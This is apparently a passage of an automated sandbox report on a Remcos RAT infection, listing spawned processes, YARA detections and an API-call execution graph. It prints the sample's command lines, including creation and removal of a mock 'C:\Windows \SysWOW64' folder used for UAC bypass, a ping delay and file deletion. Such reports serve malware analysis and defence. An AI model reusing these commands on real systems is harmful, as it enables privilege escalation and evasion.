                                                                                                Imagebase:0x7ff7699e0000
                                                                                                File size:862'208 bytes
                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:19
                                                                                                Start time:15:20:10
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                Imagebase:0x290000
                                                                                                File size:86'528 bytes
                                                                                                MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.4141580952.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 00000013.00000002.4143153198.0000000006F40000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000013.00000002.4142210416.0000000003060000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                Has exited:false

                                                                                                Target ID:20
                                                                                                Start time:15:20:10
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c mkdir "\\?\C:\Windows \SysWOW64"
                                                                                                Imagebase:0x850000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:22
                                                                                                Start time:15:20:12
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                Imagebase:0x850000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:23
                                                                                                Start time:15:20:12
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\xpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\xpha.pif 127.0.0.1 -n 10
                                                                                                Imagebase:0xc20000
                                                                                                File size:18'944 bytes
                                                                                                MD5 hash:B3624DD758CCECF93A1226CEF252CA12
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Antivirus matches:
                                                                                                • Detection: 0%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:26
                                                                                                Start time:15:20:22
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c del "C:\Users\Public\xpha.pif"
                                                                                                Imagebase:0x850000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:27
                                                                                                Start time:15:20:23
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \SysWOW64
                                                                                                Imagebase:0x850000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:28
                                                                                                Start time:15:20:23
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\Libraries\Puyiaiob.PIF
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Puyiaiob.PIF"
                                                                                                Imagebase:0x400000
                                                                                                File size:1'058'816 bytes
                                                                                                MD5 hash:35811E8D8969BEF5354C7C3E6DBEFB27
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Antivirus matches:
                                                                                                • Detection: 24%, ReversingLabs
                                                                                                Has exited:true

                                                                                                Target ID:29
                                                                                                Start time:15:20:23
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\alpha.pif
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\\Users\\Public\\alpha.pif /c rmdir "C:\Windows \"
                                                                                                Imagebase:0x850000
                                                                                                File size:236'544 bytes
                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                Has elevated privileges:true
                                                                                                Has administrator privileges:true
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Target ID:30
                                                                                                Start time:15:20:23
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\SndVol.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\SndVol.exe
                                                                                                Imagebase:0x9b0000
                                                                                                File size:226'712 bytes
                                                                                                MD5 hash:BD4A1CC3429ED1251E5185A72501839B
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Yara matches:
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000003.1964735207.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000003.1964815243.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.1965808923.0000000004A70000.00000040.00000400.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.1965400311.0000000002D7C000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: JoeSecurity_UACBypassusingCMSTP, Description: Yara detected UAC Bypass using CMSTP, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                                • Rule: Windows_Trojan_Remcos_b296e965, Description: unknown, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: REMCOS_RAT_variants, Description: unknown, Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
                                                                                                • Rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM, Description: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003), Source: 0000001E.00000002.1964879579.0000000000400000.00000040.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                Has exited:true

                                                                                                Target ID:31
                                                                                                Start time:15:20:31
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Users\Public\Libraries\Puyiaiob.PIF
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:"C:\Users\Public\Libraries\Puyiaiob.PIF"
                                                                                                Imagebase:0x400000
                                                                                                File size:1'058'816 bytes
                                                                                                MD5 hash:35811E8D8969BEF5354C7C3E6DBEFB27
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:Borland Delphi
                                                                                                Has exited:true

                                                                                                Target ID:32
                                                                                                Start time:15:20:31
                                                                                                Start date:30/11/2024
                                                                                                Path:C:\Windows\SysWOW64\colorcpl.exe
                                                                                                Wow64 process (32bit):true
                                                                                                Commandline:C:\Windows\System32\colorcpl.exe
                                                                                                Imagebase:0x290000
                                                                                                File size:86'528 bytes
                                                                                                MD5 hash:DB71E132EBF1FEB6E93E8A2A0F0C903D
                                                                                                Has elevated privileges:false
                                                                                                Has administrator privileges:false
                                                                                                Programmed in:C, C++ or other language
                                                                                                Has exited:true

                                                                                                Reset < >

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:5.5%
                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                  Signature Coverage:36.9%
                                                                                                  Total number of Nodes:664
                                                                                                  Total number of Limit Nodes:27
                                                                                                  execution_graph 16818 7ff7823e4163 16819 7ff7823e412e 16818->16819 16822 7ff7823e8f80 16819->16822 16823 7ff7823e8f89 16822->16823 16824 7ff7823e413e 16823->16824 16825 7ff7823e8fe0 RtlCaptureContext RtlLookupFunctionEntry 16823->16825 16826 7ff7823e9025 RtlVirtualUnwind 16825->16826 16827 7ff7823e9067 16825->16827 16826->16827 16830 7ff7823e8fa4 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 16827->16830 16765 7ff7823e8d80 16766 7ff7823e8da4 16765->16766 16767 7ff7823e8db6 16766->16767 16768 7ff7823e8dbf Sleep 16766->16768 16769 7ff7823e8ddb _amsg_exit 16767->16769 16774 7ff7823e8de7 16767->16774 16768->16766 16769->16774 16770 7ff7823e8e56 _initterm 16771 7ff7823e8e73 _IsNonwritableInCurrentImage 16770->16771 16779 7ff7823e37d8 GetCurrentThreadId OpenThread 16771->16779 16774->16770 16774->16771 16778 7ff7823e8e3c 16774->16778 16812 7ff7823e04f4 16779->16812 16781 7ff7823e3839 HeapSetInformation RegOpenKeyExW 16782 7ff7823e388d 16781->16782 16783 7ff7823ee9f8 RegQueryValueExW RegCloseKey 16781->16783 16784 7ff7823e5920 VirtualQuery VirtualQuery 16782->16784 16786 7ff7823eea41 GetThreadLocale 16783->16786 16785 7ff7823e38ab GetConsoleOutputCP GetCPInfo 16784->16785 16785->16786 16787 7ff7823e38f1 memset 16785->16787 16802 7ff7823e3919 16786->16802 16787->16802 16788 7ff7823e4d5c 391 API calls 16788->16802 16789 7ff7823d3240 166 API calls 16789->16802 16790 7ff7823e3948 _setjmp 16790->16802 16791 7ff7823eeb27 _setjmp 16791->16802 16792 7ff7823f8530 370 API calls 16792->16802 16793 7ff7823e01b8 6 API calls 16793->16802 16794 7ff7823ddf60 481 API calls 16794->16802 16795 7ff7823eeb71 _setmode 16795->16802 16796 7ff7823e0580 12 API calls 16798 7ff7823e398b GetConsoleOutputCP GetCPInfo 16796->16798 16797 7ff7823e86f0 182 API calls 16797->16802 16801 7ff7823e04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16798->16801 16799 7ff7823e4c1c 166 API calls 16799->16802 16800 7ff7823e58e4 EnterCriticalSection LeaveCriticalSection 16800->16802 16801->16802 16802->16783 16802->16788 16802->16789 16802->16790 16802->16791 16802->16792 16802->16793 16802->16794 16802->16795 16802->16796 16802->16797 16802->16799 16802->16800 16803 7ff7823dbe00 647 API calls 16802->16803 16804 7ff7823e58e4 EnterCriticalSection LeaveCriticalSection 16802->16804 16803->16802 16805 7ff7823eebbe GetConsoleOutputCP GetCPInfo 16804->16805 16806 7ff7823e04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16805->16806 16807 7ff7823eebe6 16806->16807 16808 7ff7823dbe00 647 API calls 16807->16808 16809 7ff7823e0580 12 API calls 16807->16809 16808->16807 16810 7ff7823eebfc GetConsoleOutputCP GetCPInfo 16809->16810 16811 7ff7823e04f4 GetModuleHandleW GetProcAddress SetThreadLocale 16810->16811 16811->16802 16813 7ff7823e0504 16812->16813 16814 7ff7823e051e GetModuleHandleW 16813->16814 16815 7ff7823e054d GetProcAddress 16813->16815 16816 7ff7823e056c SetThreadLocale 16813->16816 16814->16813 16815->16813 21899 7ff7823d6be0 21900 7ff7823dcd90 166 API calls 21899->21900 21901 7ff7823d6c04 21900->21901 21902 7ff7823d6c13 _pipe 21901->21902 21903 7ff7823f41a2 21901->21903 21906 7ff7823d6c32 21902->21906 21936 7ff7823d6e26 21902->21936 21905 7ff7823d3278 166 API calls 21903->21905 21904 7ff7823d3278 166 API calls 21904->21903 21907 7ff7823f41bc 21905->21907 21909 7ff7823d6df1 21906->21909 21950 7ff7823daffc _dup 21906->21950 21908 7ff7823fe91c 198 API calls 21907->21908 21910 7ff7823f41c1 21908->21910 21913 7ff7823d3278 166 API calls 21910->21913 21912 7ff7823d6c7d 21912->21903 21916 7ff7823db038 _dup2 21912->21916 21914 7ff7823f41d2 21913->21914 21915 7ff7823fe91c 198 API calls 21914->21915 21917 7ff7823f41d7 21915->21917 21918 7ff7823d6c93 21916->21918 21919 7ff7823d3278 166 API calls 21917->21919 21918->21917 21920 7ff7823dd208 _close 21918->21920 21921 7ff7823f41e4 21919->21921 21923 7ff7823d6ca4 21920->21923 21922 7ff7823fe91c 198 API calls 21921->21922 21925 7ff7823f41e9 21922->21925 21952 7ff7823dbe00 21923->21952 21927 7ff7823d6ccf _get_osfhandle DuplicateHandle 21928 7ff7823d6d07 21927->21928 21929 7ff7823db038 _dup2 21928->21929 21930 7ff7823d6d11 21929->21930 21930->21917 21931 7ff7823dd208 _close 21930->21931 21932 7ff7823d6d22 21931->21932 21933 7ff7823d6e21 21932->21933 21935 7ff7823daffc _dup 21932->21935 21934 7ff7823fe91c 198 API calls 21933->21934 21934->21936 21937 7ff7823d6d57 21935->21937 21936->21904 21937->21910 21938 7ff7823db038 _dup2 21937->21938 21939 7ff7823d6d6c 21938->21939 21939->21917 21940 7ff7823dd208 _close 21939->21940 21941 7ff7823d6d7c 21940->21941 21942 7ff7823dbe00 647 API calls 21941->21942 21943 7ff7823d6d9c 21942->21943 21944 7ff7823db038 _dup2 21943->21944 21945 7ff7823d6da8 21944->21945 21945->21917 21946 7ff7823dd208 _close 21945->21946 21947 7ff7823d6db9 21946->21947 21947->21933 21948 7ff7823d6dc1 21947->21948 21948->21909 21986 7ff7823d6e60 21948->21986 21951 7ff7823db018 21950->21951 21951->21912 21953 7ff7823d6cc4 21952->21953 21954 7ff7823dbe1b 21952->21954 21953->21927 21953->21928 21954->21953 21955 7ff7823dbe67 21954->21955 21956 7ff7823dbe47 memset 21954->21956 21958 7ff7823dbe73 21955->21958 21960 7ff7823dbf29 21955->21960 21962 7ff7823dbeaf 21955->21962 22063 7ff7823dbff0 21956->22063 21959 7ff7823dbe92 21958->21959 21964 7ff7823dbf0c 21958->21964 21970 7ff7823dbea1 21959->21970 21990 7ff7823dc620 GetConsoleTitleW 21959->21990 21961 7ff7823dcd90 166 API calls 21960->21961 21963 7ff7823dbf33 21961->21963 21962->21953 21967 7ff7823dbff0 185 API calls 21962->21967 21963->21962 21968 7ff7823dbf70 21963->21968 21972 7ff7823d88a8 _wcsicmp 21963->21972 22101 7ff7823db0d8 memset 21964->22101 21967->21953 21980 7ff7823dbf75 21968->21980 22161 7ff7823d71ec 21968->22161 21970->21962 21976 7ff7823daf98 2 API calls 21970->21976 21975 7ff7823dbf5a 21972->21975 21973 7ff7823dbf1e 21973->21962 21974 7ff7823dbfa9 21974->21962 21977 7ff7823dcd90 166 API calls 21974->21977 21975->21968 21978 7ff7823e0a6c 273 API calls 21975->21978 21976->21962 21979 7ff7823dbfbb 21977->21979 21978->21968 21979->21962 21981 7ff7823e081c 166 API calls 21979->21981 21982 7ff7823db0d8 194 API calls 21980->21982 21981->21980 21983 7ff7823dbf7f 21982->21983 21983->21962 22034 7ff7823e5ad8 21983->22034 21987 7ff7823d6e6d 21986->21987 21988 7ff7823d6eb9 21987->21988 21989 7ff7823e5cb4 7 API calls 21987->21989 21988->21909 21989->21987 21991 7ff7823dca2f 21990->21991 21993 7ff7823dc675 21990->21993 21992 7ff7823ec5fc GetLastError 21991->21992 21995 7ff7823d3278 166 API calls 21991->21995 21996 7ff7823e855c ??_V@YAXPEAX 21991->21996 21992->21991 21994 7ff7823dca40 17 API calls 21993->21994 22004 7ff7823dc69b 21994->22004 21995->21991 21996->21991 21997 7ff7823dc9b5 22001 7ff7823e855c ??_V@YAXPEAX 21997->22001 21998 7ff7823d89c0 23 API calls 22003 7ff7823dc964 21998->22003 21999 7ff7823dc762 21999->21991 22000 7ff7823e855c ??_V@YAXPEAX 21999->22000 21999->22003 22016 7ff7823dc83d 21999->22016 22019 7ff7823dc78a wcschr 21999->22019 22021 7ff7823dca25 21999->22021 22022 7ff7823e291c 8 API calls 21999->22022 22026 7ff7823ec684 21999->22026 22028 7ff7823dca2a 21999->22028 22000->21999 22023 7ff7823dc855 22001->22023 22002 7ff7823dc978 towupper 22002->22003 22003->21992 22003->21997 22003->21998 22003->21999 22003->22002 22003->22003 22007 7ff7823fec14 173 API calls 22003->22007 22030 7ff7823dca16 GetLastError 22003->22030 22004->21991 22004->21997 22004->21999 22005 7ff7823dd3f0 223 API calls 22004->22005 22008 7ff7823dc741 22005->22008 22006 7ff7823dc872 22010 7ff7823e855c ??_V@YAXPEAX 22006->22010 22007->21999 22009 7ff7823dc74d 22008->22009 22013 7ff7823dc8b5 wcsncmp 22008->22013 22009->21999 22014 7ff7823dbd38 207 API calls 22009->22014 22012 7ff7823dc87c 22010->22012 22011 7ff7823ec6b8 SetConsoleTitleW 22011->22006 22015 7ff7823e8f80 7 API calls 22012->22015 22013->21999 22013->22009 22014->21999 22017 7ff7823dc88e 22015->22017 22167 7ff7823dcb40 22016->22167 22017->21970 22019->21999 22025 7ff7823d3278 166 API calls 22021->22025 22022->21999 22023->22006 22023->22011 22025->21991 22027 7ff7823d3278 166 API calls 22026->22027 22027->21991 22029 7ff7823e9158 7 API calls 22028->22029 22029->21991 22032 7ff7823d3278 166 API calls 22030->22032 22033 7ff7823ec675 22032->22033 22033->21991 22035 7ff7823dcd90 166 API calls 22034->22035 22036 7ff7823e5b12 22035->22036 22037 7ff7823dcb40 166 API calls 22036->22037 22062 7ff7823e5b8b 22036->22062 22039 7ff7823e5b26 22037->22039 22038 7ff7823e8f80 7 API calls 22040 7ff7823dbf99 22038->22040 22041 7ff7823e0a6c 273 API calls 22039->22041 22039->22062 22040->21970 22042 7ff7823e5b43 22041->22042 22043 7ff7823e5bb8 22042->22043 22044 7ff7823e5b48 GetConsoleTitleW 22042->22044 22045 7ff7823e5bf4 22043->22045 22046 7ff7823e5bbd GetConsoleTitleW 22043->22046 22047 7ff7823dcad4 172 API calls 22044->22047 22048 7ff7823ef452 22045->22048 22049 7ff7823e5bfd 22045->22049 22051 7ff7823dcad4 172 API calls 22046->22051 22050 7ff7823e5b66 22047->22050 22053 7ff7823e3c24 166 API calls 22048->22053 22055 7ff7823ef462 22049->22055 22056 7ff7823e5c1b 22049->22056 22049->22062 22183 7ff7823e4224 InitializeProcThreadAttributeList 22050->22183 22054 7ff7823e5bdb 22051->22054 22053->22062 22243 7ff7823d96e8 22054->22243 22060 7ff7823d3278 166 API calls 22055->22060 22059 7ff7823d3278 166 API calls 22056->22059 22057 7ff7823e5b7f 22061 7ff7823e5c3c SetConsoleTitleW 22057->22061 22059->22062 22060->22062 22061->22062 22062->22038 22064 7ff7823dc01c 22063->22064 22065 7ff7823dc0c4 22063->22065 22066 7ff7823dc086 22064->22066 22067 7ff7823dc022 22064->22067 22065->21955 22070 7ff7823dc144 22066->22070 22083 7ff7823dc094 22066->22083 22068 7ff7823dc113 22067->22068 22069 7ff7823dc030 22067->22069 22080 7ff7823dff70 2 API calls 22068->22080 22081 7ff7823dc053 22068->22081 22071 7ff7823dc039 wcschr 22069->22071 22069->22081 22072 7ff7823dc151 22070->22072 22093 7ff7823dc1c8 22070->22093 22073 7ff7823dc301 22071->22073 22071->22081 22449 7ff7823dc460 22072->22449 22079 7ff7823dcd90 166 API calls 22073->22079 22074 7ff7823dc0c6 22078 7ff7823dc0cf wcschr 22074->22078 22088 7ff7823dc073 22074->22088 22075 7ff7823dc058 22086 7ff7823dff70 2 API calls 22075->22086 22075->22088 22077 7ff7823dc460 183 API calls 22077->22083 22084 7ff7823dc1be 22078->22084 22078->22088 22100 7ff7823dc30b 22079->22100 22080->22081 22081->22074 22081->22075 22090 7ff7823dc211 22081->22090 22083->22065 22083->22077 22085 7ff7823dcd90 166 API calls 22084->22085 22085->22093 22086->22088 22087 7ff7823dc460 183 API calls 22087->22065 22088->22065 22089 7ff7823dc460 183 API calls 22088->22089 22089->22088 22095 7ff7823dff70 2 API calls 22090->22095 22091 7ff7823dc285 22091->22090 22096 7ff7823db6b0 170 API calls 22091->22096 22092 7ff7823db6b0 170 API calls 22092->22081 22093->22065 22093->22090 22093->22091 22097 7ff7823dd840 178 API calls 22093->22097 22094 7ff7823dd840 178 API calls 22094->22100 22095->22065 22098 7ff7823dc2ac 22096->22098 22097->22093 22098->22088 22098->22090 22099 7ff7823dc3d4 22099->22088 22099->22090 22099->22092 22100->22065 22100->22090 22100->22094 22100->22099 22102 7ff7823dca40 17 API calls 22101->22102 22118 7ff7823db162 22102->22118 22103 7ff7823db2e1 22104 7ff7823db303 22103->22104 22105 7ff7823db2f7 ??_V@YAXPEAX 22103->22105 22107 7ff7823e8f80 7 API calls 22104->22107 22105->22104 22106 7ff7823db1d9 22110 7ff7823dcd90 166 API calls 22106->22110 22126 7ff7823db1ed 22106->22126 22109 7ff7823db315 22107->22109 22108 7ff7823e1ea0 8 API calls 22108->22118 22109->21959 22109->21973 22110->22126 22112 7ff7823ebfef _get_osfhandle SetFilePointer 22115 7ff7823ec01d 22112->22115 22112->22126 22113 7ff7823db228 _get_osfhandle 22114 7ff7823db23f _get_osfhandle 22113->22114 22113->22126 22114->22126 22117 7ff7823e33f0 _vsnwprintf 22115->22117 22116 7ff7823daffc _dup 22116->22126 22120 7ff7823ec038 22117->22120 22118->22103 22118->22106 22118->22108 22118->22118 22119 7ff7823e01b8 6 API calls 22119->22126 22125 7ff7823d3278 166 API calls 22120->22125 22121 7ff7823ec1c3 22122 7ff7823e33f0 _vsnwprintf 22121->22122 22122->22120 22123 7ff7823dd208 _close 22123->22126 22124 7ff7823e26e0 19 API calls 22124->22126 22127 7ff7823ec1f9 22125->22127 22126->22103 22126->22112 22126->22113 22126->22116 22126->22119 22126->22121 22126->22123 22126->22124 22128 7ff7823ec060 22126->22128 22130 7ff7823db038 _dup2 22126->22130 22131 7ff7823ec246 22126->22131 22132 7ff7823ec1a5 22126->22132 22137 7ff7823db356 22126->22137 22463 7ff7823ff318 _get_osfhandle GetFileType 22126->22463 22129 7ff7823daf98 2 API calls 22127->22129 22128->22131 22135 7ff7823e09f4 2 API calls 22128->22135 22129->22103 22130->22126 22133 7ff7823daf98 2 API calls 22131->22133 22134 7ff7823db038 _dup2 22132->22134 22136 7ff7823ec24b 22133->22136 22138 7ff7823ec1b7 22134->22138 22139 7ff7823ec084 22135->22139 22140 7ff7823ff1d8 166 API calls 22136->22140 22146 7ff7823daf98 2 API calls 22137->22146 22141 7ff7823ec1be 22138->22141 22142 7ff7823ec207 22138->22142 22143 7ff7823db900 166 API calls 22139->22143 22140->22103 22147 7ff7823dd208 _close 22141->22147 22145 7ff7823dd208 _close 22142->22145 22144 7ff7823ec08c 22143->22144 22148 7ff7823ec094 wcsrchr 22144->22148 22160 7ff7823ec0ad 22144->22160 22145->22137 22149 7ff7823ec211 22146->22149 22147->22121 22148->22160 22150 7ff7823e33f0 _vsnwprintf 22149->22150 22151 7ff7823ec22c 22150->22151 22152 7ff7823d3278 166 API calls 22151->22152 22152->22103 22153 7ff7823ec106 22154 7ff7823dff70 2 API calls 22153->22154 22156 7ff7823ec13b 22154->22156 22155 7ff7823ec0e0 _wcsnicmp 22155->22160 22156->22131 22157 7ff7823ec146 SearchPathW 22156->22157 22157->22131 22158 7ff7823ec188 22157->22158 22159 7ff7823e26e0 19 API calls 22158->22159 22159->22132 22160->22153 22160->22155 22162 7ff7823d7279 22161->22162 22164 7ff7823d7211 _setjmp 22161->22164 22162->21974 22164->22162 22165 7ff7823d7265 22164->22165 22464 7ff7823d72b0 22165->22464 22168 7ff7823dcb63 22167->22168 22169 7ff7823dcd90 166 API calls 22168->22169 22170 7ff7823dc848 22169->22170 22170->22023 22171 7ff7823dcad4 22170->22171 22172 7ff7823dcad9 22171->22172 22180 7ff7823dcb05 22171->22180 22173 7ff7823dcd90 166 API calls 22172->22173 22172->22180 22174 7ff7823ec722 22173->22174 22175 7ff7823ec72e GetConsoleTitleW 22174->22175 22174->22180 22176 7ff7823ec74a 22175->22176 22175->22180 22177 7ff7823db6b0 170 API calls 22176->22177 22182 7ff7823ec778 22177->22182 22178 7ff7823ec7ec 22179 7ff7823dff70 2 API calls 22178->22179 22179->22180 22180->22023 22181 7ff7823ec7dd SetConsoleTitleW 22181->22178 22182->22178 22182->22181 22184 7ff7823eecd4 GetLastError 22183->22184 22185 7ff7823e42ab UpdateProcThreadAttribute 22183->22185 22188 7ff7823eecee 22184->22188 22186 7ff7823eecf0 GetLastError 22185->22186 22187 7ff7823e42eb memset memset GetStartupInfoW 22185->22187 22280 7ff7823f9eec 22186->22280 22189 7ff7823e3a90 170 API calls 22187->22189 22191 7ff7823e43a8 22189->22191 22193 7ff7823db900 166 API calls 22191->22193 22194 7ff7823e43bb 22193->22194 22195 7ff7823e43cc 22194->22195 22196 7ff7823e4638 _local_unwind 22194->22196 22197 7ff7823e4415 22195->22197 22198 7ff7823e43de wcsrchr 22195->22198 22196->22195 22267 7ff7823e5a68 _get_osfhandle SetConsoleMode _get_osfhandle SetConsoleMode 22197->22267 22198->22197 22199 7ff7823e43f7 lstrcmpW 22198->22199 22199->22197 22201 7ff7823e4668 22199->22201 22268 7ff7823f9044 22201->22268 22202 7ff7823e441a 22204 7ff7823e442a CreateProcessW 22202->22204 22205 7ff7823e4596 